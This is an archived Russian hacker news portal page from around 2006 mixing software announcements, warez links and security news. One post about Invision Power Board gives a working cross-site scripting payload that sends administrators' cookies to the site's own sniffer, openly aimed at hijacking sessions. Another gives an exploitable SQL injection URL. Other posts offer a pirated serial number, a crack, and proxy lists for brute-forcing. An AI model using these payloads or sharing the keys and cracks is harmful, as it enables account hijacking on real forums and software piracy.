Архив новостей (2004-2015 год)

[scaM]

Mmm+ 2.02

Удобная программа для избавления от ненужных пунктов контекстного меню. Позволяет скрывать и/или организовывать меню на нужный вам лад. Версия плюс отличается от бесплатной тем, что так же позволяет работать с меню других программ (помимо explorer). В их числе браузеры, файловые менеджеры (tc, x2, powerdesk), acdsee и object dock и др.[New$paN]

Страница загрузки

0J+/lrEdFwHR/pL3iRZuiSX42sk0K3kdMv6+Imi
R7hlRG5bU3EwTSTY+7U4Xf/8YGX1LlkAtXUPtr
U8+YA+ulP+XcKGUf/oVw88jxlOpAWD4qaMCTwD
K9rbAe7b/C1xTC9g76iAQyiemWtrJA+BgWxw/z
GaUDi0RQX7wbrliQqik=0DXel9Q2PmpIC0+G/7
4U7jw9thbELv9XL9e8YkM/JkgR/h94GZW/rWNA
Q+PgurjSPnHq/QrQP73Kj9d6fgLfmnzWhedqW1
6EC8Xw5Tb2kZV4+u+HL8KqYUeVD6DUG3FkzsiG
kfjFNH3lNkq3TWjXe1l2XGM49i5dMi/7f0MBXrFU=

 

[Winux]

Множественные уязвимости в INVISION POWER BOARD 2.1.x
3 крупных уязвимости обнаружили ребята из ru-24 team.
SQL-инъекции: 2 штуки, а также раскрытие полного пути. От себя добавлю несколько таких раскрытй в IPB 2.0.х.
Подробно читаем далее[New$paN]:
1) SQL Injection
В скрипте calendar.php в функции cal_event_save( $type='add' ) отсутствует проверка на тип в переменной event_id

$event_id          = $this->ipsclass->input['event_id'];

Далее эта переменная подставляется напрямую в запрос к БД

$this->ipsclass->DB->simple_construct( array( 'select' => '*', 'from' => 'cal_events', 'where' => "event_id=$event_id" ) );

(и еще один запрос Это позволяет модифицировать запрос к базе данных

http://path_to_forum/index.php?act=calendar&code=doedit&type=qqq&event_id=your_SQL

Для успешной эксплуатации данной уязвимоти необходимо обладать правами для манипуляции с событиями календаря (добавление, редактирование)
Для исправления данной уязвимости достаточно

$event_id          = $this->ipsclass->input['event_id'];

заменить на

$event_id = intval($this->ipsclass->input['event_id']);

2) Из-за ошибок в скриптах можно определить полный путь к установочной дирректории форума обратившись к одному из следующих скриптов напрямую:

path_to_forum/sources/loginauth/ldap/auth.php
path_to_forum/sources/loginauth/internal/auth.php
path_to_forum/sources/loginauth/external/auth.php
path_to_forum/sources/loginauth/convert/auth.php
path_to_forum/sources/loginauth/convert/auth.php.bak
path_to_forum/sources/lib/search_mysql_man.php
path_to_forum/sources/lib/search_mysql_ftext.php
path_to_forum/sources/classes/post/class_post_edit.php
path_to_forum/sources/classes/post/class_post_new.php
path_to_forum/sources/classes/post/class_post_reply.php
path_to_forum/sources/classes/editor/class_editor_std.php
path_to_forum/sources/classes/editor/class_editor_rte.php
path_to_forum/sources/classes/bbcode/class_bbcode.php
path_to_forum/sources/classes/bbcode/class_bbcode_legacy.php
path_to_forum/sources/acp_loaders/acp_pages_components.php
path_to_forum/ips_kernel/PEAR/Text/Diff3.php
path_to_forum/ips_kernel/PEAR/Text/Diff/Renderer/inline.php
path_to_forum/ips_kernel/PEAR/Text/Diff/Renderer/unified.php

Уязвимости найдены в форуме v2.1.3.Возможно уязвимы и другие версии.

От себя добавлю, что в ipb 2.0.x в файлах из папки mysql_queries такаяже уязвимость.

3) SQL-injecrion exploit
Можно получить ссылку на смену пароля админа или любого юзера.
Есть условия: подходящая MySQL версия и включенный CURL-module.

 

[Winux]

Марсель Низамутдинов Тактика защиты и нападения на Web-приложения
http://news.xss.pro/25.02.2006_2810_2D00_2D49_29_small.jpg
Рассмотрены вопросы обнаружения, исследования, эксплуатации и устранения уязвимостей в программном коде Web-приложений. Описаны наиболее часто встречаемые уязвимости и основные принципы написания защищенного кода. Большое внимание уделено методам защиты баз данных от SQL-инъекций. Приведены различные способы построения безопасной системы авторизации и аутификации. Рассмотрен межсайтовый скриптинг (ХSS) с точки зрения построения безопасного кода при создании чатов, форумов, систем доступа к электронной почте через Web-интерфейс и др. Уделено внимание вопросам безопасности и защиты систем при размещении сайта на сервере хостинговой компании. Приведено описание вируса, размножающегося исключительно через уязвимости в Web-приложениях. Материал книги сопровождается многочисленными практическими примерами и рекомендациями.[New$paN]
Скачать|Download

 

[Ŧ1LAN]

Открылся новый сервис для хранения и публикации ваших файлов в интернете - http://Up-file.com, отличная замена RapidShare и ему подобных!
Преимущества http://Up-file.com читаем далее>>[New$paN]

• Сервис абсолютно бесплатный!
• Никаких лимитов по скорости 100 мегабитный канал предоставлен вам абсолютно полностью!
• Никаких ограничений на количество скачиваемых файлов.
• Не нужна регистрация.
• Не требуется никаких специальных программ.
• хранение ваших файлов до тех пор, пока они не понадобятся вам вновь
• Максимальный размер закачиваемого файла 1ГБ!!!

Пользуйтесь на здоровье!

 

[Winux]

Готов таки новый дизайн
http://news.xss.pro/newddesign.gif
Наконец тогов новый дизайн. Теперь можно с гордостью заявить, что все здесь нарисовано нами.
Думаю говорить про то что изменилось не стоит.
Респекты:
1) XeOn за переделанное лого. Хорошая идея
2) Yast за кнопочки под логотипом
3) Себе любимому за мудежку с шаблонами и перерисовку всех кнопочек и пр.

Для тех кто хочет стырить дизайн себе сообщаю: жизайн полностью принадлежит нам. Все авторские права наши и речи об экспорте скина идти не может.

Нужно отметить, что сайт оптимизирован для работы с отключенной графикой. При отключении графики (в разных браузерах по-разному) вместо кнопок отображаются удобные ссылки. В некоторых браузерах они будут обведены в квадрат отсутствия картинки. Лично у меня в огнелисе все вообще супер.[New$paN]
Теперь весь фон под логотипом (вся полоса) является ссылкой на индекс, что порой очень удобно.
Обо всех багад диза и несочетаемости цветов писать в этой теме или мне в асю.

 

[X·ė·Ø·n]

http://news.xss.pro/AITNM.gif

AIMICQ Typing Notification Mixer - это рефлекторный инкубатор для удалённого пользователя. Используется для провоцирования психоделепсической активности удалённого "абонента".
Техническая составляющая: программа формирует специальные пакеты уведомления-написания сообщения (mini typing notification), и отправляя эти пакеты удалённому пользователю(ям). На другом конце пользователь(ли) получают лже-уведомления о наборе вами текста.

[New$paN]

Если эмоции кубинской революции переполняют вашу голову и вам не терпится скорей поделиться этими эмоциями с окружающими, то это универсальное средство при подобном диагнозе. Программное обеспечение испытывали в НИИ "Психодислептики и рыболовства", при этом весь исследуемый коллектив не редко возмущался и подавал признаки свойственные признакам животного "собака падлова".

Органы управления и манипулирования, а также процесс их запуска.
В качестве первого шага необходимо занести в первое поле (за картинкой с изображением "человеческой головы и человеческих плеч") ваш UIN или AIM SN; в следующее поле (за картинкой с изображением "авангардной снежинки") следует занести пароль от аккаунта, который вы внесли в предыдущее поле. Затем необходимо нажать кнопку с надписью "Sign On", а также рекомендуется нажать кнопку с изображением "горизонтальной ёлки" - для контроля всех ваших следующих действий. После завершения процедуры логина в левой части программы обновиться список, в котором появятся все пользователи, находящиеся в вашем серверном контакт листе. При этом онлайн пользователи будут помечены полосками с цветом "нежно-доллорового отлива". Для начала эксперимента следует отметить подопытных галочками, и нажать кнопку с надписью "Start". При этих действиях вы можете изменить параметры отправки, выбрав опционально из списка "Typing Sign Type", следует помнить, что не все клиенты способны различать все представленные параметры; обычно универсальным является параметр "begun". Поиск, глобальное выделение представлены в нижней части окна. Добавления дополнительного пользователя осуществляется с нажатием кнопки "+1".

Скачать|Download

by AUR
Источник: zloy.org

 

[scaM]

Hide Private File Pro v6.01

Hide Private File Pro - программа с помощью которой вы с лёгкостью можете скрыть ваши папки.[New$paN]

Страница загрузки

 

[Winux]

Неслабая XSS в IPB Всех версия до 2.1.4 включительно
Короче найдена новая бага в ИПБ. Суть баги в кнопочке ЖАЛОБА, которая есть под каждым помтом. Если глупый админ отключит кнопку из шаблонов - ее можно будет легко достать по адресу

http://forum/index.php?act=report&t=12&p=123&st=0

Суть XSS в том, что в данном поле вообще не фильтруется HTML.
Собстно достаточно там вставить код:

<script>img = new Image(); img.src = "http://xss.pro/sources/sniff/sniff.php?"+document.cookie;</script>

И администратор, прочитав письмо, не подозревая отправит свои куки на наш сниффер.
Тем, кого интересует патч - стучим в асю. Наиболее достойные проекты его получат [New$paN] А может и все B)

 

[Winux]

BobCat 0.2
BobCat 0.2 - программа, помогающая обнаружить уязвимости в веб-приложениях типа: SQL-Inj. Прога сама под винду и работает только с MS SQL[New$paN]
Скачать|Download
:zns2: Инфа на оффсайте
Источник: vipusers.net

 

[Winux]

Исскуство вторжения
http://news.xss.pro/isskustvo_vtorjenia.jpg
Истории, рассказанные в этой книге, демонстрируют, как небезопасны все компьютерные системы, и как мы уязвимы перед подобными атаками.
Урок этих историй заключается в том, что хакеры находят новые и новые уязвимости каждый день. Читая эту книгу, думайте не о том, как изучить конкретные уязвимости тех или иных устройств, а о том, как изменить ваш подход к проблеме безопасности и приобрести новый опыт.
Если вы профессионал в области информационных технологий или обеспечения безопасности, каждая из историй станет для вас своеобразным уроком того, как повысить уровень безопасности в вашей компании. Если же вы не имеете отношения к технике и просто любите детективы, истории о рисковых и мужественных парнях - вы найдете их на страницах этой книги.[New$paN]
Скачать|Download
Пароль: www.2baksa.net
Источник: vipusers.net
Вес: 38 метров

 

[Winux]

IPB Pack All in one
http://news.xss.pro/ipb_all_in_one.jpg
Пак всех версий форума IPB, а также навороты в виде модов, хаков итд.[New$paN]
Скачать|Download

 

[scaM]

KillProcess 2.31

KillProcess - может "убивать" любые процессы из списка запущенных процессов в Windows, в том числе и сервисы Windows. Очень полезная вешь для всех, т.к. зачастую все сталкиваются с зависшими процессами, не убиваемыми стандарными средствами.[New$paN]

Скачать|Download (1.5 Mb)

 

[Winux]

Анонимность и прокси - новый раздел
http://news.xss.pro/proxy.gif
У нас открылся новый раздел на форуме - Анонимность и прокси.
В данном разделе будут обсуждаться проблемы анонимности, софта, VPN, а также ежедневное обновление прокси листов, а главным образом - будут выкладываться свежие листы для брута. Также списки соксов, анонимных и неанонимных прокси.
Вообщем приглашаем посетить сабж. Все делается для вас)[New$paN]

 

[scaM]

Maya Unlimited 7.01

Maya Unlimited - выбор разработчиков цифровых изображений, которые хотят привести свои трехмерные проекты к самому передовому уровню. Alias Maya Unlimited является одним из наиболее мощных пакетов 3D-графики. Области ее применения чрезвычайно обширны — это и реклама, и архитектура, и телевидение, не говоря уже о различных спецэффектах и мультипликации. Maya позволяет создавать любые реалистические или фантастические эффекты, реализовывать самые смелые замыслы, моделировать объекты любого уровня сложности.[New$paN] Если вас интересует мир трехмерной графики и вы хотите создавать объекты и вдыхать в них жизнь, то Maya предоставит вам такую возможность.

Скачать|Download (320 Mb)
Зеркало|Mirror (320 Mb)

 

[Winux]

Open AIM - раскрытие кодов AIM сети
Сабж. Новость не первой свежести, сначала постить не хотел, ну пусть будет.
Новый проект от America Online зовется Open AIM. Проект поможет кодерам принять активное участие в написании приложений под AIM, изучая специфику протокола на офф сайте.
Официальная страница проекта[New$paN]:
:zns2: OpenAOL

 

[Winux]

QIP 2005a Build 7830
Немного с опозданием, но всже.
Добавлено:
# настраиваемая горячая клавиша анти-босс;
# настраиваемая горячая клавиша анти-босс с вводом пароля учетной записи;
Исправлено/Обновлено:
# [исп] позиционирование главного окна во время запуска при использовании двух мониторов;
# [исп] ошибки в выборочной отправке при использовании aim ника;
# [исп] появлялось контекстное меню при закрытии всплывающих сообщений правой кнопкой мыши;
# [обн] ссылка на смену пароля через веб;
# [обн] файл перевода на русский язык;
# [обн] незначительные обновления в коде;
[New$paN]
Скачать|Download

 

[Winux]

http://news.xss.pro/zf.gif
Все выпуски этого замечательного журнала отныне можно скаать и у нас. Хороший, однако весьма старый журнал по вирусологии и про хакеров пополнит коллекцию раритета на вашем винте.[New$paN]
Скачать|Download - 1 номер
Скачать|Download - 2 номер
Скачать|Download - 3 номер
Скачать|Download - 4 номер
Скачать|Download - 5 номер

Короче говоря журнал выходил раз в год. Все файлы в досовской кодировке, однако в некоторые выпуски вложена софтина для обработки сабжа.
Если не получается - я не виноват.

 

[scaM]

DeskCalc v3.4.2

DeskCalc - многофункциональный калькулятор для тех, кому часто и много приходится считать. Возможности программы:
- вычисление сложных выражений,
- история вычислений,
- экспорт данных в Excel,
- работа в десятичном, шестнадцатеричном, восьмеричном и двоичном форматах,
- математические функции,
- конвертер валют с возможностью импорта текущих курсов.

Скачать|Download 1.5 Mb
Serial

name/comp: freeserials.net
sn: CAL-V3-JCWVEFXKA

 

[scaM]

LabelsWin v.1.0

LabelsWin - это уникальное расширение для Windows, которое позволяет устанавливать цвета на файлы,иконки и папки. Эта функция теперь стала доступна и в Windows.Раньше эта примочка была доступна только для пользователей Mac.[New$paN]

Скачать|Download
:zns1: Кряк|Crack

 

[Ma-stiff]

В период примерно с 5.00 и до 8.00 21.3.2006 будет производиться перенос сайта на новый сервер, в связи с этим возможны временные перебои в работе. Так же возможны случаи недоступности портала до 23.3.2006 включительно в связи делегированием к новым ip адресам. Администрация приносит свои извинения за перебои в работе портала.